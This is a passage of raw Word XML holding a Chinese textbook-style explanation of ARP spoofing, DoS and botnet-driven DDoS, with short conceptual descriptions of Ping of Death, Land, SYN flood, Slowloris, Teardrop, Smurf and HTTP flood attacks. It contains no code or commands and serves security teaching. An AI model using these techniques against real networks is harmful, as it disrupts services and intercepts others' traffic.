    <w:p w14:paraId="491535A7" w14:textId="4218EF53" w:rsidR="007D6467" w:rsidRDefault="0057652A" w:rsidP="00E46AC3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欺骗攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCECB29" w14:textId="77777777" w:rsidR="0057652A" w:rsidRPr="005B7C6D" w:rsidRDefault="0057652A" w:rsidP="0057652A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/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   </w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t xml:space="preserve"> Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字典释义为</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>欺骗、哄骗</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。从网络观点看，大致可以对</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三种资源进行欺骗攻击。下面介绍最具代表性的</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>欺骗。</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议用于根据</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址获取</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部有</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存表，保存</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的对应信息。识别通信对方时，只要访问相应表提取其</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址即可。若在</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存表中查不到相应信息，则可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议获取指定</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址对应的</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54BEA2" w14:textId="77777777" w:rsidR="0057652A" w:rsidRPr="005B7C6D" w:rsidRDefault="0057652A" w:rsidP="0057652A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005B7C6D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议在设计时未充分考虑安全问题，所以很容易受到攻击。只要使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>ARPReply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包即可轻松操作对方的</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存表。</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存表保存着通信对方的</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址映射关系。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D22256C" w14:textId="77777777" w:rsidR="0057652A" w:rsidRPr="005B7C6D" w:rsidRDefault="0057652A" w:rsidP="0057652A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005B7C6D">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑客将</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PCA</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PCB</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的信息替换为自身</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址后，所有通信都会经过黑客</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B439167" w14:textId="33CE9912" w:rsidR="007D6467" w:rsidRDefault="0057652A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17D30D3A" wp14:editId="03BE47A2">
            <wp:extent cx="5274310" cy="29051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4761" w14:textId="19888C77" w:rsidR="007D6467" w:rsidRDefault="00FC028E" w:rsidP="00E46AC3">
      <w:pPr>
        <w:pStyle w:val="1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Dos攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20862A1D" w14:textId="77777777" w:rsidR="00FC028E" w:rsidRPr="005B7C6D" w:rsidRDefault="00FC028E" w:rsidP="00FC028E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝服务攻击（</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>Dos</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>Denial of Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是网络中最常用的黑客攻击技术之一。前面提到过，</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议本身在结构上存在多种安全隐患。通过修改</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包的发送方地址，或者不</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>断发送</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包，将大量</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包分割为更小的单位进行传送等，即可使系统服务陷入瘫痪。</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击指通过发送大量正常的数据包使系统服务瘫痪。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560A6876" w14:textId="77777777" w:rsidR="00FC028E" w:rsidRPr="005B7C6D" w:rsidRDefault="00FC028E" w:rsidP="00FC028E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005B7C6D">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前出现了许多防范</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击的设备，使用少数几台</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发动</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击使攻击目标系统服务瘫痪并非易事。为了解决这一问题，黑客广泛散播病毒，将大量</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机变为僵尸</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通过控制这些僵尸</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送大量合法服务请求，以达到使目标主机服务瘫痪的目的，这种攻击称为</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布式拒绝服务攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>Distributed Denial of Service</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0710048D" w14:textId="48EE27F6" w:rsidR="00FC028E" w:rsidRDefault="00FC028E" w:rsidP="00FC028E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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="737FDE3B" wp14:editId="47D9224D">
            <wp:extent cx="5274310" cy="16319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148E" w14:textId="77777777" w:rsidR="00BA504E" w:rsidRPr="005B7C6D" w:rsidRDefault="00BA504E" w:rsidP="00BA504E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布式拒绝服务攻击使用僵尸网络（</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>Botnet)</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。僵尸网络是指，借助网络广泛传播含有恶意代码的文件（僵尸程序），感染网络上的大量</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并将其变为僵尸</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后通过</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器控制这些僵尸</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，最后组成庞大的网络。恶意代码可以通过电子邮件、公告栏、木马等多</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>种方式进行传播，而对此进行实际防范并非易事。目前，通过僵尸网络发动</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击仍然是非常有用的黑客攻击手段。为了防范</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，国家机关与金融机构大力推行网络隔离，将业务网与互联网隔离。网络隔离技术中，物理或逻辑网络被隔离，这样即使接入互联网的某台</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="005B7C6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机感染了恶意代码，其影响范围也不会扩散到内网。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F49C8" w14:textId="7909A0A7" w:rsidR="007D6467" w:rsidRDefault="00BA504E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01653230" wp14:editId="1B1DA909">
            <wp:extent cx="5274310" cy="2402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DD88" w14:textId="0A437710" w:rsidR="007D6467" w:rsidRDefault="007D6467"/>
    <w:p w14:paraId="593B4D52" w14:textId="31520B5B" w:rsidR="007D6467" w:rsidRDefault="003F1D28">
      <w:r w:rsidRPr="003F1D28">
        <w:t>DoS攻击阻止服务器正常工作。大部分DoS攻击都利用网络协议漏洞，但也有部分DoS攻击通过触发大量正常服务请求使服务器瘫痪。DoS攻击虽然简单，但破坏能力非常惊人。目前，DoS攻击技术正在向DDoS与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F1D28">
        <w:t>DrDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F1D28">
        <w:t>等技术演化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845E524" w14:textId="0F49845A" w:rsidR="007D6467" w:rsidRDefault="003F1D28">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12672CCA" wp14:editId="5BD74A0E">
            <wp:extent cx="5274310" cy="25761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86C0" w14:textId="77777777" w:rsidR="009A6074" w:rsidRDefault="009A6074" w:rsidP="009A6074">
      <w:r>
        <w:t xml:space="preserve">    黑客可以使用HTTP、TCP、PING、ICMP等协议，采用多种方法攻击服务器。攻击会不断消耗服务器的带宽、内存、CPU、磁盘资源，最终导致瘫痪，无法正常对外提供服务。DoS攻击成功后，用户将无法得到服务器对所请求服务的响应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7FA7E0" w14:textId="37A6595B" w:rsidR="007D6467" w:rsidRDefault="009A6074" w:rsidP="009A6074">
      <w:r>
        <w:t xml:space="preserve">    DoS攻击由来已久，方法多样，比如发送大量合法HTTP服务请求、恶意使用IP包的传输特性发动攻击等。常用的DoS攻击技术如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3531DD" w14:textId="5C753401" w:rsidR="004C2F55" w:rsidRDefault="004C2F55" w:rsidP="004C2F55">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C2F55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>死亡之Ping</w:t>
      </w:r>
      <w:r w:rsidR="00B87AE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> of Death</w:t>
      </w:r>
      <w:r w:rsidR="00B87AE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>ping实用程序使用的ICMP包很大（如65535字节），远远大于普通大小（32字节）时，它就会被分片，分割为网络可以处理的大小。服务器处理大量ICMP包时会消耗大量系统资源，最终资源耗尽，导致瘫痪。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC6C31B" w14:textId="77777777" w:rsidR="004C2F55" w:rsidRDefault="004C2F55" w:rsidP="004C2F55">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C2F55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>着陆攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（Land Attack）</w:t>
      </w:r>
      <w:r>
        <w:t>请求TCP连接发送SYN包时，SYN包具有相同源地址与目的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>地址，均设置为服务器地址。这样，服务器回送SYN/ACK包时，发现目的地址就是自己，导致服务器不断向自己发送SYN/ACK包，最终造成系统崩溃。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573791CA" w14:textId="77777777" w:rsidR="004C2F55" w:rsidRDefault="004C2F55" w:rsidP="004C2F55">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="004C2F55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP SYN洪水攻击</w:t>
      </w:r>
      <w:r>
        <w:t>该攻击利用了TCP连接过程中的安全缺陷。客户机向服务器发送SYN包时，服务器会向客户机回送SYN/ACK包。然后，客户机向服务器ACK包建立TCP连接。若最后一步客户机不向服务器发送ACK包，则服务器一直等待，处于SYN Received状态。不断重复这一过程，服务器的缓冲将被全部耗尽，从而瘫痪。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0C7F4" w14:textId="77777777" w:rsidR="004C2F55" w:rsidRDefault="004C2F55" w:rsidP="004C2F55">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="004C2F55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C2F55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slowloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C2F55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
      <w:r>
        <w:t>黑客与服务器建立正常会话后，向服务器发送非正常HTTP请求头（未结束的HTTP头）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F639FC1" w14:textId="77777777" w:rsidR="004C2F55" w:rsidRDefault="004C2F55" w:rsidP="004C2F55">
      <w:r>
        <w:t xml:space="preserve">    服务器认为HTTP请求部分没有结束，保持此连接不释放，继续等待完整请求。随着这种开放状态的连接数量增加，服务器连接数就会很快达到上限，从而无法处理新的请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A77E097" w14:textId="331E9B7D" w:rsidR="009A6074" w:rsidRDefault="004C2F55" w:rsidP="004C2F55">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="004C2F55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tear Drop攻击</w:t>
      </w:r>
      <w:r>
        <w:t>传送大数据包时，会先对数据包进行分片，这些分片到达目的地时再重新组装。分片数据包包含该分片偏移量，可以通过操纵偏移量的值，使其大于实际偏移量，造成重叠偏移。这会引发服务器溢出问题，使服务陷入瘫痪。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EDE649" w14:textId="77777777" w:rsidR="00262AEB" w:rsidRDefault="00262AEB" w:rsidP="00262AEB">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00262AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Smurf Attack</w:t>
      </w:r>
      <w:r>
        <w:t>该攻击恶意利用ICMP包特性。ICMP协议的特征是，发送请求就会有响应。发送ICMP请求前，先将ICMP源地址更改为目标服务器地址。这样，每个接收到ICMP请求的主机都会做出答复，导致服务器被大量ICMP响应吞没，网络发生阻塞，从而拒绝为正常请求服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C32EC" w14:textId="18A844F4" w:rsidR="009A6074" w:rsidRDefault="00262AEB" w:rsidP="00262AEB">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00262AEB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP 洪水攻击</w:t>
      </w:r>
      <w:r>
        <w:t>该攻击大量调用正常服务，使服务瘫痪。若同时大量请求Web服务器提供服务的URL，Web服务器的CPU与连接资源会很快耗尽，从而陷入瘫痪。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63774D05" w14:textId="72D2A4A3" w:rsidR="009A6074" w:rsidRDefault="009A6074"/>
    <w:p w14:paraId="1602E9AB" w14:textId="397FE99D" w:rsidR="009A6074" w:rsidRDefault="001D2217" w:rsidP="001D2217">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS：死亡之ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE64949" w14:textId="0C256972" w:rsidR="009A6074" w:rsidRDefault="00B90504">
      <w:r w:rsidRPr="00B90504">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
